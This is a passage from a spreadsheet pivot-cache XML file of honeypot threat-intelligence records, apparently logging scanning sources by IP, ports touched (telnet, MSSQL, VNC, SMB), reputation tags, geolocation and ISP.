    <s v="8452"/>
    <s v="TE-AS"/>
    <s v="TE Data"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c530:6d2c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1382"/>
    <x v="1382"/>
    <s v="net-188-219-166-214.cust.vodafonedsl.it&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:10:15"/>
    <d v="2025-03-12T10:48:41"/>
    <d v="2025-04-17T07:10:15"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="30722"/>
    <s v="Vodafone Italia S.p.A."/>
    <s v="VODAFONE"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bcdb:a6d6"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1383"/>
    <x v="1383"/>
    <s v="host-78-148-247-221.as13285.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:10:15"/>
    <d v="2025-02-28T11:42:10"/>
    <d v="2025-04-17T07:10:15"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H47"/>
    <s v="9100&amp;&amp;23&amp;&amp;NA&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Barnsley"/>
    <s v="Wortley"/>
    <s v="2633514"/>
    <s v="NA"/>
    <s v="53.4833"/>
    <s v="-1.53333"/>
    <s v="13285"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="TalkTalk"/>
    <s v="residential"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4e94:f7dd"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1384"/>
    <x v="1384"/>
    <s v="114-40-166-129.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:58:04"/>
    <d v="2025-04-17T04:03:59"/>
    <d v="2025-04-17T06:58:04"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7228:a681"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1385"/>
    <x v="1385"/>
    <s v="host-95-228-113-135.business.telecomitalia.it&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:56:58"/>
    <d v="2025-04-16T20:28:10"/>
    <d v="2025-04-17T06:56:58"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="Telecom Italia S.p.A."/>
    <s v="business"/>
    <s v="INTERBUSINESS"/>
    <s v="2009-01-15"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5fe4:7187"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1386"/>
    <x v="1386"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:37:42"/>
    <d v="2025-04-17T06:37:42"/>
    <d v="2025-04-17T06:37:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Cầu Giấy District"/>
    <s v="Cầu Giấy"/>
    <s v="8616113"/>
    <s v="NA"/>
    <s v="21.0323"/>
    <s v="105.801"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel Corporation"/>
    <s v="consumer"/>
    <s v="Viettel Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7461:27b5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1387"/>
    <x v="1387"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:28:47"/>
    <d v="2025-04-17T06:27:27"/>
    <d v="2025-04-17T06:28:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Lamongan"/>
    <s v="Babat"/>
    <s v="1650888"/>
    <s v="NA"/>
    <s v="-7.11282"/>
    <s v="112.164"/>
    <s v="138886"/>
    <s v="PT Data Buana Nusantara"/>
    <s v="PT Data Buana Nusantara"/>
    <s v="business"/>
    <s v="PT Jaringan Buana Nusantara"/>
    <s v="2021-02-19"/>
    <s v="IDNIC-DBNNET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a3:2466"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1388"/>
    <x v="1388"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:14:37"/>
    <d v="2025-04-17T05:50:53"/>
    <d v="2025-04-17T06:14:37"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Marine Parade"/>
    <s v="1882778"/>
    <s v="449536"/>
    <s v="1.32429"/>
    <s v="103.893"/>
    <s v="55430"/>
    <s v="Starhub Internet Pte Ltd"/>
    <s v="StarHub Cable Vision Ltd"/>
    <s v="residential"/>
    <s v="StarHub Ltd NGNBN Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7458:6207"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1389"/>
    <x v="1389"/>
    <s v="NA&amp;&amp;88-173-88-75.subs.proxad.net"/>
    <x v="0"/>
    <d v="2025-04-17T06:12:29"/>
    <d v="2025-04-15T15:28:35"/>
    <d v="2025-04-17T06:12:29"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="PAC"/>
    <s v="Provence"/>
    <s v="Bouches-du-Rhône"/>
    <s v="Marseille (Saint-Antoine)"/>
    <s v="2995469"/>
    <s v="13015"/>
    <s v="43.3715"/>
    <s v="5.36345"/>
    <s v="12322"/>
    <s v="Free SAS"/>
    <s v="ProXad network / Free SAS"/>
    <s v="residential"/>
    <s v="Proxad / Free SAS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58ad:584b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1390"/>
    <x v="1390"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:12:28"/>
    <d v="2024-12-10T02:23:45"/>
    <d v="2025-04-17T06:12:28"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="45"/>
    <s v="Jeollabuk-do"/>
    <s v="Iksan-si"/>
    <s v="Iksan-si"/>
    <s v="1843663"/>
    <s v="54535"/>
    <s v="35.9444"/>
    <s v="126.96"/>
    <s v="17583"/>
    <s v="Keumgang Cable Network"/>
    <s v="Keumgang Cable Network"/>
    <s v="business"/>
    <s v="Kcnnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7c2e:cec8"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1391"/>
    <x v="1391"/>
    <s v="42-2-33-060.static.netvigator.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:12:23"/>
    <d v="2025-04-07T10:04:06"/>
    <d v="2025-04-17T06:12:23"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="PCCW IMS Limited"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a02:213c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1392"/>
    <x v="1392"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:12:05"/>
    <d v="2024-07-13T12:41:59"/>
    <d v="2025-04-17T06:12:05"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;6379&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Manjunath Nagar Chikkalsandra)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9947"/>
    <s v="77.5504"/>
    <s v="142513"/>
    <s v="LEVOTEL BIGNET SOLUTIONS PVT LTD"/>
    <s v="Levotel Bignet Solutions PVT LTD"/>
    <s v="business"/>
    <s v="Levotel Bignet Solutions PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,63956)}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,64694)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,51792)}&amp;&amp;{Data_SMB:Incoming connection (103.170.245.110,52770)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67aa:f56e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1393"/>
    <x v="1393"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:11:36"/>
    <d v="2025-03-25T22:42:11"/>
    <d v="2025-04-17T06:11:36"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="26"/>
    <s v="Busan"/>
    <s v="Dongnae-gu"/>
    <s v="Dongnae"/>
    <s v="1834203"/>
    <s v="NA"/>
    <s v="35.2075"/>
    <s v="129.083"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b13:d97d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1394"/>
    <x v="1394"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:10:50"/>
    <d v="2025-04-02T13:48:52"/>
    <d v="2025-04-17T06:10:50"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8933"/>
    <s v="6.05805"/>
    <s v="215462"/>
    <s v="Noel Nayasha Materke"/>
    <s v="Noel Nayasha Materke"/>
    <s v="hosting"/>
    <s v="Mario Networks Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b041:8a3f"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1395"/>
    <x v="1395"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:10:40"/>
    <d v="2025-04-14T18:12:26"/>
    <d v="2025-04-17T06:10:40"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MS"/>
    <s v="Mississippi"/>
    <s v="Panola"/>
    <s v="Batesville"/>
    <s v="4417130"/>
    <s v="38606"/>
    <s v="34.3087"/>
    <s v="-89.9258"/>
    <s v="55120"/>
    <s v="Tallahatchie Valley Internet Services, LLC"/>
    <s v="Tallahatchie Valley Internet Services, LLC"/>
    <s v="residential"/>
    <s v="Tallahatchie Valley Internet Services, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d8f5:70aa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1396"/>
    <x v="1396"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T06:10:32"/>
    <d v="2025-02-25T13:49:38"/>
    <d v="2025-04-17T06:10:32"/>
    <n v="89"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H22"/>
    <s v="5900&amp;&amp;45800&amp;&amp;43604&amp;&amp;49034&amp;&amp;40214&amp;&amp;46728&amp;&amp;33034&amp;&amp;NA&amp;&amp;59544"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="SC"/>
    <s v="Seychelles"/>
    <s v="16"/>
    <s v="La Rivière Anglaise"/>
    <s v="NA"/>
    <s v="Victoria"/>
    <s v="241131"/>
    <s v="NA"/>
    <s v="-4.62113"/>
    <s v="55.4522"/>
    <s v="401120"/>
    <s v="cheapy.host LLC"/>
    <s v="cheapy.host LLC"/>
    <s v="hosting"/>
    <s v="Internet Secuirty Cheapyhost"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4fb:481f"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1397"/>
    <x v="1397"/>
    <s v="NA"/>
    <x v="0"/>
